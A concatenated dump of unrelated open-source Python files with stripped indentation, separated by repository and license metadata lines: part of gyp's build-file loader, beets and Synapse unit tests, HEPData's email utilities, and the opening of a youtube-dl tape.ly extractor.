# whether no exclusion or inclusion has been applied. Items for which
# no exclusion or inclusion has been applied (yet) have value -1, items
# excluded have value 0, and items included have value 1. Includes and
# excludes override previous actions. All items in list_actions are
# initialized to -1 because no excludes or includes have been processed
# yet.
list_actions = list((-1,) * len(the_list))
exclude_key = list_key + '!'
if exclude_key in the_dict:
for exclude_item in the_dict[exclude_key]:
for index in xrange(0, len(the_list)):
if exclude_item == the_list[index]:
# This item matches the exclude_item, so set its action to 0
# (exclude).
list_actions[index] = 0
# The "whatever!" list is no longer needed, dump it.
del the_dict[exclude_key]
regex_key = list_key + '/'
if regex_key in the_dict:
for regex_item in the_dict[regex_key]:
[action, pattern] = regex_item
pattern_re = re.compile(pattern)
if action == 'exclude':
# This item matches an exclude regex, so set its value to 0 (exclude).
action_value = 0
elif action == 'include':
# This item matches an include regex, so set its value to 1 (include).
action_value = 1
else:
# This is an action that doesn't make any sense.
raise ValueError, 'Unrecognized action ' + action + ' in ' + name + \
' key ' + regex_key
for index in xrange(0, len(the_list)):
list_item = the_list[index]
if list_actions[index] == action_value:
# Even if the regex matches, nothing will change so continue (regex
# searches are expensive).
continue
if pattern_re.search(list_item):
# Regular expression match.
list_actions[index] = action_value
# The "whatever/" list is no longer needed, dump it.
del the_dict[regex_key]
# Add excluded items to the excluded list.
#
# Note that exclude_key ("sources!") is different from excluded_key
# ("sources_excluded"). The exclude_key list is input and it was already
# processed and deleted; the excluded_key list is output and it's about
# to be created.
excluded_key = list_key + '_excluded'
if excluded_key in the_dict:
raise GypError(name + ' key ' + excluded_key +
' must not be present prior '
' to applying exclusion/regex filters for ' + list_key)
excluded_list = []
# Go backwards through the list_actions list so that as items are deleted,
# the indices of items that haven't been seen yet don't shift. That means
# that things need to be prepended to excluded_list to maintain them in the
# same order that they existed in the_list.
for index in xrange(len(list_actions) - 1, -1, -1):
if list_actions[index] == 0:
# Dump anything with action 0 (exclude). Keep anything with action 1
# (include) or -1 (no include or exclude seen for the item).
excluded_list.insert(0, the_list[index])
del the_list[index]
# If anything was excluded, put the excluded list into the_dict at
# excluded_key.
if len(excluded_list) > 0:
the_dict[excluded_key] = excluded_list
# Now recurse into subdicts and lists that may contain dicts.
for key, value in the_dict.iteritems():
if isinstance(value, dict):
ProcessListFiltersInDict(key, value)
elif isinstance(value, list):
ProcessListFiltersInList(key, value)
def ProcessListFiltersInList(name, the_list):
for item in the_list:
if isinstance(item, dict):
ProcessListFiltersInDict(name, item)
elif isinstance(item, list):
ProcessListFiltersInList(name, item)
def ValidateTargetType(target, target_dict):
"""Ensures the 'type' field on the target is one of the known types.
Arguments:
target: string, name of target.
target_dict: dict, target spec.
Raises an exception on error.
"""
VALID_TARGET_TYPES = ('executable', 'loadable_module',
'static_library', 'shared_library',
'none')
target_type = target_dict.get('type', None)
if target_type not in VALID_TARGET_TYPES:
raise GypError("Target %s has an invalid target type '%s'. "
"Must be one of %s." %
(target, target_type, '/'.join(VALID_TARGET_TYPES)))
if (target_dict.get('standalone_static_library', 0) and
not target_type == 'static_library'):
raise GypError('Target %s has type %s but standalone_static_library flag is'
' only valid for static_library type.' % (target,
target_type))
def ValidateSourcesInTarget(target, target_dict, build_file):
# TODO: Check if MSVC allows this for loadable_module targets.
if target_dict.get('type', None) not in ('static_library', 'shared_library'):
return
sources = target_dict.get('sources', [])
basenames = {}
for source in sources:
name, ext = os.path.splitext(source)
is_compiled_file = ext in [
'.c', '.cc', '.cpp', '.cxx', '.m', '.mm', '.s', '.S']
if not is_compiled_file:
continue
basename = os.path.basename(name) # Don't include extension.
basenames.setdefault(basename, []).append(source)
error = ''
for basename, files in basenames.iteritems():
if len(files) > 1:
error += ' %s: %s\n' % (basename, ' '.join(files))
if error:
print('static library %s has several files with the same basename:\n' %
target + error + 'Some build systems, e.g. MSVC08, '
'cannot handle that.')
raise GypError('Duplicate basenames in sources section, see list above')
def ValidateRulesInTarget(target, target_dict, extra_sources_for_rules):
"""Ensures that the rules sections in target_dict are valid and consistent,
and determines which sources they apply to.
Arguments:
target: string, name of target.
target_dict: dict, target spec containing "rules" and "sources" lists.
extra_sources_for_rules: a list of keys to scan for rule matches in
addition to 'sources'.
"""
# Dicts to map between values found in rules' 'rule_name' and 'extension'
# keys and the rule dicts themselves.
rule_names = {}
rule_extensions = {}
rules = target_dict.get('rules', [])
for rule in rules:
# Make sure that there's no conflict among rule names and extensions.
rule_name = rule['rule_name']
if rule_name in rule_names:
raise GypError('rule %s exists in duplicate, target %s' %
(rule_name, target))
rule_names[rule_name] = rule
rule_extension = rule['extension']
if rule_extension.startswith('.'):
rule_extension = rule_extension[1:]
if rule_extension in rule_extensions:
raise GypError(('extension %s associated with multiple rules, ' +
'target %s rules %s and %s') %
(rule_extension, target,
rule_extensions[rule_extension]['rule_name'],
rule_name))
rule_extensions[rule_extension] = rule
# Make sure rule_sources isn't already there. It's going to be
# created below if needed.
if 'rule_sources' in rule:
raise GypError(
'rule_sources must not exist in input, target %s rule %s' %
(target, rule_name))
rule_sources = []
source_keys = ['sources']
source_keys.extend(extra_sources_for_rules)
for source_key in source_keys:
for source in target_dict.get(source_key, []):
(source_root, source_extension) = os.path.splitext(source)
if source_extension.startswith('.'):
source_extension = source_extension[1:]
if source_extension == rule_extension:
rule_sources.append(source)
if len(rule_sources) > 0:
rule['rule_sources'] = rule_sources
def ValidateRunAsInTarget(target, target_dict, build_file):
target_name = target_dict.get('target_name')
run_as = target_dict.get('run_as')
if not run_as:
return
if not isinstance(run_as, dict):
raise GypError("The 'run_as' in target %s from file %s should be a "
"dictionary." %
(target_name, build_file))
action = run_as.get('action')
if not action:
raise GypError("The 'run_as' in target %s from file %s must have an "
"'action' section." %
(target_name, build_file))
if not isinstance(action, list):
raise GypError("The 'action' for 'run_as' in target %s from file %s "
"must be a list." %
(target_name, build_file))
working_directory = run_as.get('working_directory')
if working_directory and not isinstance(working_directory, str):
raise GypError("The 'working_directory' for 'run_as' in target %s "
"in file %s should be a string." %
(target_name, build_file))
environment = run_as.get('environment')
if environment and not isinstance(environment, dict):
raise GypError("The 'environment' for 'run_as' in target %s "
"in file %s should be a dictionary." %
(target_name, build_file))
def ValidateActionsInTarget(target, target_dict, build_file):
'''Validates the inputs to the actions in a target.'''
target_name = target_dict.get('target_name')
actions = target_dict.get('actions', [])
for action in actions:
action_name = action.get('action_name')
if not action_name:
raise GypError("Anonymous action in target %s. "
"An action must have an 'action_name' field." %
target_name)
inputs = action.get('inputs', None)
if inputs is None:
raise GypError('Action in target %s has no inputs.' % target_name)
action_command = action.get('action')
if action_command and not action_command[0]:
raise GypError("Empty action as command in target %s." % target_name)
def TurnIntIntoStrInDict(the_dict):
"""Given dict the_dict, recursively converts all integers into strings.
"""
# Use items instead of iteritems because there's no need to try to look at
# reinserted keys and their associated values.
for k, v in the_dict.items():
if isinstance(v, int):
v = str(v)
the_dict[k] = v
elif isinstance(v, dict):
TurnIntIntoStrInDict(v)
elif isinstance(v, list):
TurnIntIntoStrInList(v)
if isinstance(k, int):
the_dict[str(k)] = v
del the_dict[k]
def TurnIntIntoStrInList(the_list):
"""Given list the_list, recursively converts all integers into strings.
"""
for index in xrange(0, len(the_list)):
item = the_list[index]
if isinstance(item, int):
the_list[index] = str(item)
elif isinstance(item, dict):
TurnIntIntoStrInDict(item)
elif isinstance(item, list):
TurnIntIntoStrInList(item)
def PruneUnwantedTargets(targets, flat_list, dependency_nodes, root_targets,
data):
"""Return only the targets that are deep dependencies of |root_targets|."""
qualified_root_targets = []
for target in root_targets:
target = target.strip()
qualified_targets = gyp.common.FindQualifiedTargets(target, flat_list)
if not qualified_targets:
raise GypError("Could not find target %s" % target)
qualified_root_targets.extend(qualified_targets)
wanted_targets = {}
for target in qualified_root_targets:
wanted_targets[target] = targets[target]
for dependency in dependency_nodes[target].DeepDependencies():
wanted_targets[dependency] = targets[dependency]
wanted_flat_list = [t for t in flat_list if t in wanted_targets]
# Prune unwanted targets from each build_file's data dict.
for build_file in data['target_build_files']:
if not 'targets' in data[build_file]:
continue
new_targets = []
for target in data[build_file]['targets']:
qualified_name = gyp.common.QualifiedTarget(build_file,
target['target_name'],
target['toolset'])
if qualified_name in wanted_targets:
new_targets.append(target)
data[build_file]['targets'] = new_targets
return wanted_targets, wanted_flat_list
def VerifyNoCollidingTargets(targets):
"""Verify that no two targets in the same directory share the same name.
Arguments:
targets: A list of targets in the form 'path/to/file.gyp:target_name'.
"""
# Keep a dict going from 'subdirectory:target_name' to 'foo.gyp'.
used = {}
for target in targets:
# Separate out 'path/to/file.gyp, 'target_name' from
# 'path/to/file.gyp:target_name'.
path, name = target.rsplit(':', 1)
# Separate out 'path/to', 'file.gyp' from 'path/to/file.gyp'.
subdir, gyp = os.path.split(path)
# Use '.' for the current directory '', so that the error messages make
# more sense.
if not subdir:
subdir = '.'
# Prepare a key like 'path/to:target_name'.
key = subdir + ':' + name
if key in used:
# Complain if this target is already used.
raise GypError('Duplicate target name "%s" in directory "%s" used both '
'in "%s" and "%s".' % (name, subdir, gyp, used[key]))
used[key] = gyp
def SetGeneratorGlobals(generator_input_info):
# Set up path_sections and non_configuration_keys with the default data plus
# the generator-specific data.
global path_sections
path_sections = base_path_sections[:]
path_sections.extend(generator_input_info['path_sections'])
global non_configuration_keys
non_configuration_keys = base_non_configuration_keys[:]
non_configuration_keys.extend(generator_input_info['non_configuration_keys'])
global multiple_toolsets
multiple_toolsets = generator_input_info[
'generator_supports_multiple_toolsets']
global generator_filelist_paths
generator_filelist_paths = generator_input_info['generator_filelist_paths']
def Load(build_files, variables, includes, depth, generator_input_info, check,
circular_check, parallel, root_targets):
SetGeneratorGlobals(generator_input_info)
# A generator can have other lists (in addition to sources) be processed
# for rules.
extra_sources_for_rules = generator_input_info['extra_sources_for_rules']
# Load build files. This loads every target-containing build file into
# the |data| dictionary such that the keys to |data| are build file names,
# and the values are the entire build file contents after "early" or "pre"
# processing has been done and includes have been resolved.
# NOTE: data contains both "target" files (.gyp) and "includes" (.gypi), as
# well as meta-data (e.g. 'included_files' key). 'target_build_files' keeps
# track of the keys corresponding to "target" files.
data = {'target_build_files': set()}
aux_data = {}
# Normalize paths everywhere. This is important because paths will be
# used as keys to the data dict and for references between input files.
build_files = set(map(os.path.normpath, build_files))
if parallel:
LoadTargetBuildFilesParallel(build_files, data, aux_data,
variables, includes, depth, check,
generator_input_info)
else:
for build_file in build_files:
try:
LoadTargetBuildFile(build_file, data, aux_data,
variables, includes, depth, check, True)
except Exception, e:
gyp.common.ExceptionAppend(e, 'while trying to load %s' % build_file)
raise
# Build a dict to access each target's subdict by qualified name.
targets = BuildTargetsDict(data)
# Fully qualify all dependency links.
QualifyDependencies(targets)
# Remove self-dependencies from targets that have 'prune_self_dependencies'
# set to 1.
RemoveSelfDependencies(targets)
# Expand dependencies specified as build_file:*.
ExpandWildcardDependencies(targets, data)
# Apply exclude (!) and regex (/) list filters only for dependency_sections.
for target_name, target_dict in targets.iteritems():
tmp_dict = {}
for key_base in dependency_sections:
for op in ('', '!', '/'):
key = key_base + op
if key in target_dict:
tmp_dict[key] = target_dict[key]
del target_dict[key]
ProcessListFiltersInDict(target_name, tmp_dict)
# Write the results back to |target_dict|.
for key in tmp_dict:
target_dict[key] = tmp_dict[key]
# Make sure every dependency appears at most once.
RemoveDuplicateDependencies(targets)
if circular_check:
# Make sure that any targets in a.gyp don't contain dependencies in other
# .gyp files that further depend on a.gyp.
VerifyNoGYPFileCircularDependencies(targets)
[dependency_nodes, flat_list] = BuildDependencyList(targets)
if root_targets:
# Remove, from |targets| and |flat_list|, the targets that are not deep
# dependencies of the targets specified in |root_targets|.
targets, flat_list = PruneUnwantedTargets(
targets, flat_list, dependency_nodes, root_targets, data)
# Check that no two targets in the same directory have the same name.
VerifyNoCollidingTargets(flat_list)
# Handle dependent settings of various types.
for settings_type in ['all_dependent_settings',
'direct_dependent_settings',
'link_settings']:
DoDependentSettings(settings_type, flat_list, targets, dependency_nodes)
# Take out the dependent settings now that they've been published to all
# of the targets that require them.
for target in flat_list:
if settings_type in targets[target]:
del targets[target][settings_type]
# Make sure static libraries don't declare dependencies on other static
# libraries, but that linkables depend on all unlinked static libraries
# that they need so that their link steps will be correct.
gii = generator_input_info
if gii['generator_wants_static_library_dependencies_adjusted']:
AdjustStaticLibraryDependencies(flat_list, targets, dependency_nodes,
gii['generator_wants_sorted_dependencies'])
# Apply "post"/"late"/"target" variable expansions and condition evaluations.
for target in flat_list:
target_dict = targets[target]
build_file = gyp.common.BuildFile(target)
ProcessVariablesAndConditionsInDict(
target_dict, PHASE_LATE, variables, build_file)
# Move everything that can go into a "configurations" section into one.
for target in flat_list:
target_dict = targets[target]
SetUpConfigurations(target, target_dict)
# Apply exclude (!) and regex (/) list filters.
for target in flat_list:
target_dict = targets[target]
ProcessListFiltersInDict(target, target_dict)
# Apply "latelate" variable expansions and condition evaluations.
for target in flat_list:
target_dict = targets[target]
build_file = gyp.common.BuildFile(target)
ProcessVariablesAndConditionsInDict(
target_dict, PHASE_LATELATE, variables, build_file)
# Make sure that the rules make sense, and build up rule_sources lists as
# needed. Not all generators will need to use the rule_sources lists, but
# some may, and it seems best to build the list in a common spot.
# Also validate actions and run_as elements in targets.
for target in flat_list:
target_dict = targets[target]
build_file = gyp.common.BuildFile(target)
ValidateTargetType(target, target_dict)
# TODO(thakis): Get vpx_scale/arm/scalesystemdependent.c to be renamed to
# scalesystemdependent_arm_additions.c or similar.
if 'arm' not in variables.get('target_arch', ''):
ValidateSourcesInTarget(target, target_dict, build_file)
ValidateRulesInTarget(target, target_dict, extra_sources_for_rules)
ValidateRunAsInTarget(target, target_dict, build_file)
ValidateActionsInTarget(target, target_dict, build_file)
# Generators might not expect ints. Turn them into strs.
TurnIntIntoStrInDict(data)
# TODO(mark): Return |data| for now because the generator needs a list of
# build files that came in. In the future, maybe it should just accept
# a list, and not the whole data dict.
return [flat_list, targets, data]
| mit |
ruippeixotog/beets | test/test_types_plugin.py | 25 | 4986 | # This file is part of beets.
# Copyright 2015, Thomas Scholtes.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
from __future__ import (division, absolute_import, print_function,
unicode_literals)
import time
from datetime import datetime
from test._common import unittest
from test.helper import TestHelper
from beets.util.confit import ConfigValueError
class TypesPluginTest(unittest.TestCase, TestHelper):
def setUp(self):
self.setup_beets()
self.load_plugins('types')
def tearDown(self):
self.unload_plugins()
self.teardown_beets()
def test_integer_modify_and_query(self):
self.config['types'] = {'myint': 'int'}
item = self.add_item(artist='aaa')
# Do not match unset values
out = self.list('myint:1..3')
self.assertEqual('', out)
self.modify('myint=2')
item.load()
self.assertEqual(item['myint'], 2)
# Match in range
out = self.list('myint:1..3')
self.assertIn(b'aaa', out)
def test_album_integer_modify_and_query(self):
self.config['types'] = {'myint': 'int'}
album = self.add_album(albumartist='aaa')
# Do not match unset values
out = self.list_album('myint:1..3')
self.assertEqual('', out)
self.modify('-a', 'myint=2')
album.load()
self.assertEqual(album['myint'], 2)
# Match in range
out = self.list_album('myint:1..3')
self.assertIn(b'aaa', out)
def test_float_modify_and_query(self):
self.config['types'] = {'myfloat': 'float'}
item = self.add_item(artist='aaa')
self.modify('myfloat=-9.1')
item.load()
self.assertEqual(item['myfloat'], -9.1)
# Match in range
out = self.list('myfloat:-10..0')
self.assertIn(b'aaa', out)
def test_bool_modify_and_query(self):
self.config['types'] = {'mybool': 'bool'}
true = self.add_item(artist='true')
false = self.add_item(artist='false')
self.add_item(artist='unset')
# Set true
self.modify('mybool=1', 'artist:true')
true.load()
self.assertEqual(true['mybool'], True)
# Set false
self.modify('mybool=false', 'artist:false')
false.load()
self.assertEqual(false['mybool'], False)
# Query bools
out = self.list('mybool:true', '$artist $mybool')
self.assertEqual('true True', out)
out = self.list('mybool:false', '$artist $mybool')
# Dealing with unset fields?
# self.assertEqual('false False', out)
# out = self.list('mybool:', '$artist $mybool')
# self.assertIn('unset $mybool', out)
def test_date_modify_and_query(self):
self.config['types'] = {'mydate': 'date'}
# FIXME parsing should also work with default time format
self.config['time_format'] = '%Y-%m-%d'
old = self.add_item(artist='prince')
new = self.add_item(artist='britney')
self.modify('mydate=1999-01-01', 'artist:prince')
old.load()
self.assertEqual(old['mydate'], mktime(1999, 01, 01))
self.modify('mydate=1999-12-30', 'artist:britney')
new.load()
self.assertEqual(new['mydate'], mktime(1999, 12, 30))
# Match in range
out = self.list('mydate:..1999-07', '$artist $mydate')
self.assertEqual('prince 1999-01-01', out)
# FIXME some sort of timezone issue here
# out = self.list('mydate:1999-12-30', '$artist $mydate')
# self.assertEqual('britney 1999-12-30', out)
def test_unknown_type_error(self):
self.config['types'] = {'flex': 'unkown type'}
with self.assertRaises(ConfigValueError):
self.run_command('ls')
def modify(self, *args):
return self.run_with_output('modify', '--yes', '--nowrite',
'--nomove', *args)
def list(self, query, fmt='$artist - $album - $title'):
return self.run_with_output('ls', '-f', fmt, query).strip()
def list_album(self, query, fmt='$albumartist - $album - $title'):
return self.run_with_output('ls', '-a', '-f', fmt, query).strip()
def mktime(*args):
return time.mktime(datetime(*args).timetuple())
def suite():
return unittest.TestLoader().loadTestsFromName(__name__)
if __name__ == b'__main__':
unittest.main(defaultTest='suite')
| mit |
iot-factory/synapse | tests/appservice/test_scheduler.py | 4 | 9973 | # -*- coding: utf-8 -*-
# Copyright 2015 OpenMarket Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from synapse.appservice import ApplicationServiceState, AppServiceTransaction
from synapse.appservice.scheduler import (
_ServiceQueuer, _TransactionController, _Recoverer
)
from twisted.internet import defer
from ..utils import MockClock
from mock import Mock
from tests import unittest
class ApplicationServiceSchedulerTransactionCtrlTestCase(unittest.TestCase):
def setUp(self):
self.clock = MockClock()
self.store = Mock()
self.as_api = Mock()
self.recoverer = Mock()
self.recoverer_fn = Mock(return_value=self.recoverer)
self.txnctrl = _TransactionController(
clock=self.clock, store=self.store, as_api=self.as_api,
recoverer_fn=self.recoverer_fn
)
def test_single_service_up_txn_sent(self):
# Test: The AS is up and the txn is successfully sent.
service = Mock()
events = [Mock(), Mock()]
txn_id = "foobar"
txn = Mock(id=txn_id, service=service, events=events)
# mock methods
self.store.get_appservice_state = Mock(
return_value=defer.succeed(ApplicationServiceState.UP)
)
txn.send = Mock(return_value=defer.succeed(True))
self.store.create_appservice_txn = Mock(
return_value=defer.succeed(txn)
)
# actual call
self.txnctrl.send(service, events)
self.store.create_appservice_txn.assert_called_once_with(
service=service, events=events # txn made and saved
)
self.assertEquals(0, len(self.txnctrl.recoverers)) # no recoverer made
txn.complete.assert_called_once_with(self.store) # txn completed
def test_single_service_down(self):
# Test: The AS is down so it shouldn't push; Recoverers will do it.
# It should still make a transaction though.
service = Mock()
events = [Mock(), Mock()]
txn = Mock(id="idhere", service=service, events=events)
self.store.get_appservice_state = Mock(
return_value=defer.succeed(ApplicationServiceState.DOWN)
)
self.store.create_appservice_txn = Mock(
return_value=defer.succeed(txn)
)
# actual call
self.txnctrl.send(service, events)
self.store.create_appservice_txn.assert_called_once_with(
service=service, events=events # txn made and saved
)
self.assertEquals(0, txn.send.call_count) # txn not sent though
self.assertEquals(0, txn.complete.call_count) # or completed
def test_single_service_up_txn_not_sent(self):
# Test: The AS is up and the txn is not sent. A Recoverer is made and
# started.
service = Mock()
events = [Mock(), Mock()]
txn_id = "foobar"
txn = Mock(id=txn_id, service=service, events=events)
# mock methods
self.store.get_appservice_state = Mock(
return_value=defer.succeed(ApplicationServiceState.UP)
)
self.store.set_appservice_state = Mock(return_value=defer.succeed(True))
txn.send = Mock(return_value=defer.succeed(False)) # fails to send
self.store.create_appservice_txn = Mock(
return_value=defer.succeed(txn)
)
# actual call
self.txnctrl.send(service, events)
self.store.create_appservice_txn.assert_called_once_with(
service=service, events=events
)
self.assertEquals(1, self.recoverer_fn.call_count) # recoverer made
self.assertEquals(1, self.recoverer.recover.call_count) # and invoked
self.assertEquals(1, len(self.txnctrl.recoverers)) # and stored
self.assertEquals(0, txn.complete.call_count) # txn not completed
self.store.set_appservice_state.assert_called_once_with(
service, ApplicationServiceState.DOWN # service marked as down
)
class ApplicationServiceSchedulerRecovererTestCase(unittest.TestCase):
def setUp(self):
self.clock = MockClock()
self.as_api = Mock()
self.store = Mock()
self.service = Mock()
self.callback = Mock()
self.recoverer = _Recoverer(
clock=self.clock,
as_api=self.as_api,
store=self.store,
service=self.service,
callback=self.callback,
)
def test_recover_single_txn(self):
txn = Mock()
# return one txn to send, then no more old txns
txns = [txn, None]
def take_txn(*args, **kwargs):
return defer.succeed(txns.pop(0))
self.store.get_oldest_unsent_txn = Mock(side_effect=take_txn)
self.recoverer.recover()
# shouldn't have called anything prior to waiting for exp backoff
self.assertEquals(0, self.store.get_oldest_unsent_txn.call_count)
txn.send = Mock(return_value=True)
# wait for exp backoff
self.clock.advance_time(2)
self.assertEquals(1, txn.send.call_count)
self.assertEquals(1, txn.complete.call_count)
# 2 because it needs to get None to know there are no more txns
self.assertEquals(2, self.store.get_oldest_unsent_txn.call_count)
self.callback.assert_called_once_with(self.recoverer)
self.assertEquals(self.recoverer.service, self.service)
def test_recover_retry_txn(self):
txn = Mock()
txns = [txn, None]
pop_txn = False
def take_txn(*args, **kwargs):
if pop_txn:
return defer.succeed(txns.pop(0))
else:
return defer.succeed(txn)
self.store.get_oldest_unsent_txn = Mock(side_effect=take_txn)
self.recoverer.recover()
self.assertEquals(0, self.store.get_oldest_unsent_txn.call_count)
txn.send = Mock(return_value=False)
self.clock.advance_time(2)
self.assertEquals(1, txn.send.call_count)
self.assertEquals(0, txn.complete.call_count)
self.assertEquals(0, self.callback.call_count)
self.clock.advance_time(4)
self.assertEquals(2, txn.send.call_count)
self.assertEquals(0, txn.complete.call_count)
self.assertEquals(0, self.callback.call_count)
self.clock.advance_time(8)
self.assertEquals(3, txn.send.call_count)
self.assertEquals(0, txn.complete.call_count)
self.assertEquals(0, self.callback.call_count)
txn.send = Mock(return_value=True) # successfully send the txn
pop_txn = True # returns the txn the first time, then no more.
self.clock.advance_time(16)
self.assertEquals(1, txn.send.call_count) # new mock reset call count
self.assertEquals(1, txn.complete.call_count)
self.callback.assert_called_once_with(self.recoverer)
class ApplicationServiceSchedulerQueuerTestCase(unittest.TestCase):
def setUp(self):
self.txn_ctrl = Mock()
self.queuer = _ServiceQueuer(self.txn_ctrl)
def test_send_single_event_no_queue(self):
# Expect the event to be sent immediately.
service = Mock(id=4)
event = Mock()
self.queuer.enqueue(service, event)
self.txn_ctrl.send.assert_called_once_with(service, [event])
def test_send_single_event_with_queue(self):
d = defer.Deferred()
self.txn_ctrl.send = Mock(return_value=d)
service = Mock(id=4)
event = Mock(event_id="first")
event2 = Mock(event_id="second")
event3 = Mock(event_id="third")
# Send an event and don't resolve it just yet.
self.queuer.enqueue(service, event)
# Send more events: expect send() to NOT be called multiple times.
self.queuer.enqueue(service, event2)
self.queuer.enqueue(service, event3)
self.txn_ctrl.send.assert_called_with(service, [event])
self.assertEquals(1, self.txn_ctrl.send.call_count)
# Resolve the send event: expect the queued events to be sent
d.callback(service)
self.txn_ctrl.send.assert_called_with(service, [event2, event3])
self.assertEquals(2, self.txn_ctrl.send.call_count)
def test_multiple_service_queues(self):
# Tests that each service has its own queue, and that they don't block
# on each other.
srv1 = Mock(id=4)
srv_1_defer = defer.Deferred()
srv_1_event = Mock(event_id="srv1a")
srv_1_event2 = Mock(event_id="srv1b")
srv2 = Mock(id=6)
srv_2_defer = defer.Deferred()
srv_2_event = Mock(event_id="srv2a")
srv_2_event2 = Mock(event_id="srv2b")
send_return_list = [srv_1_defer, srv_2_defer]
self.txn_ctrl.send = Mock(side_effect=lambda x,y: send_return_list.pop(0))
# send events for different ASes and make sure they are sent
self.queuer.enqueue(srv1, srv_1_event)
self.queuer.enqueue(srv1, srv_1_event2)
self.txn_ctrl.send.assert_called_with(srv1, [srv_1_event])
self.queuer.enqueue(srv2, srv_2_event)
self.queuer.enqueue(srv2, srv_2_event2)
self.txn_ctrl.send.assert_called_with(srv2, [srv_2_event])
# make sure callbacks for a service only send queued events for THAT
# service
srv_2_defer.callback(srv2)
self.txn_ctrl.send.assert_called_with(srv2, [srv_2_event2])
self.assertEquals(3, self.txn_ctrl.send.call_count)
| apache-2.0 |
HEPData/hepdata | hepdata/modules/email/utils.py | 1 | 3669 | # This file is part of HEPData.
# Copyright (C) 2016 CERN.
#
# HEPData is free software; you can redistribute it
# and/or modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# HEPData is distributed in the hope that it will be
# useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with HEPData; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307, USA.
#
# In applying this license, CERN does not
# waive the privileges and immunities granted to it by virtue of its status
# as an Intergovernmental Organization or submit itself to any jurisdiction.
"""Provides high-level common email utilities."""
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from smtplib import SMTP, SMTPRecipientsRefused
from celery import shared_task
from flask import current_app
from flask_celeryext import create_celery_app
def create_send_email_task(destination, subject, message, reply_to_address=None):
"""
Schedules a task to send an email.
:param destination:
:param subject:
:param message:
:param reply_to_address:
:return: send_email
"""
# this is required for some unknown reason due to an initialisation problem with celery.
if not current_app.config.get('TESTING', False):
create_celery_app(current_app)
print('Sending email to {0}'.format(destination))
send_email.delay(destination, subject, message, reply_to_address)
else:
print('Not sending email as TESTING=True; would have sent email to {0}:'.format(destination))
import re
clean = re.compile('(?s)<.*?>')
newlines = re.compile(r'(?ms)(\n(\s*)){2,}')
print(re.sub(newlines, '\n', re.sub(clean, '', message)))
@shared_task
def send_email(destination, subject, message, reply_to_address=None):
try:
connection = connect()
mmp_msg = MIMEMultipart('alternative')
mmp_msg['Subject'] = subject
mmp_msg['From'] = reply_to_address if reply_to_address else current_app.config['MAIL_DEFAULT_SENDER']
mmp_msg['To'] = destination
part1 = MIMEText(message, 'html', 'utf-8')
mmp_msg.attach(part1)
recipients = destination.split(',')
recipients.append(current_app.config['ADMIN_EMAIL'])
connection.send_message(mmp_msg, current_app.config['MAIL_DEFAULT_SENDER'], recipients)
connection.quit()
except SMTPRecipientsRefused as smtp_error:
send_error_mail(smtp_error)
except Exception as e:
print('Exception occurred.')
raise e
def send_error_mail(exception):
"""
Sends an error email to the default system email (which should always be valid!).
:param exception: SMTPRecipientsRefused exception
"""
# get default
destination_email = current_app.config['SECURITY_EMAIL_SENDER']
create_send_email_task(destination_email, '[HEPData Error] Error sending email', str(exception))
def connect():
smtp = SMTP()
smtp.connect(current_app.config['MAIL_SERVER'], current_app.config['MAIL_PORT'])
if not current_app.config['SMTP_NO_PASSWORD']:
if current_app.config['SMTP_ENCRYPTION']:
smtp.starttls()
smtp.login(current_app.config['MAIL_USERNAME'], current_app.config['MAIL_PASSWORD'])
return smtp
| gpl-2.0 |
jemekite/youtube-dl | youtube_dl/extractor/tapely.py | 124 | 3760 | # coding: utf-8
from __future__ import unicode_literals
import re
from .common import InfoExtractor
from ..compat import (
compat_urllib_request,
)
from ..utils import (
clean_html,
ExtractorError,
float_or_none,
parse_iso8601,
)
class TapelyIE(InfoExtractor):
_VALID_URL = r'https?://(?:www\.)?tape\.ly/(?P<id>[A-Za-z0-9\-_]+)(?:/(?P<songnr>\d+))?'
_API_URL = 'http://tape.ly/showtape?id={0:}'
_S3_SONG_URL = 'http://mytape.s3.amazonaws.com/{0:}'
_SOUNDCLOUD_SONG_URL = 'http://api.soundcloud.com{0:}'
_TESTS = [
{
'url': 'http://tape.ly/my-grief-as-told-by-water',
'info_dict': {
'id': 23952,
'title': 'my grief as told by water',
'thumbnail': 're:^https?://.*\.png$',
'uploader_id': 16484,
'timestamp': 1411848286,
'description': 'For Robin and Ponkers, whom the tides of life have taken out to sea.',
},
'playlist_count': 13,
},
{
'url': 'http://tape.ly/my-grief-as-told-by-water/1',
'md5': '79031f459fdec6530663b854cbc5715c',
'info_dict': {
'id': 258464,
'title': 'Dreaming Awake (My Brightest Diamond)',
'ext': 'm4a',
},
},
]
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
display_id = mobj.group('id')
playlist_url = self._API_URL.format(display_id)
request = compat_urllib_request.Request(playlist_url)
request.add_header('X-Requested-With', 'XMLHttpRequest')
request.add_header('Accept', 'application/json')
request.add_header('Referer', url)
playlist = self._download_json(request, display_id)
tape = playlist['tape']
entries = []
for s in tape['songs']:
song = s['song']
entry = {
'id': song['id'],
'duration': float_or_none(song.get('songduration'), 1000),
'title': song['title'],
}
if song['source'] == 'S3':
entry.update({
'url': self._S3_SONG_URL.format(song['filename']),
})
entries.append(entry)
elif song['source'] == 'YT':
self.to_screen('YouTube video detected')
yt_id = song['filename'].replace('/youtube/', '')
entry.update(self.url_result(yt_id, 'Youtube', video_id=yt_id))
entries.append(entry)
elif song['source'] == 'SC':
self.to_screen('SoundCloud song detected')
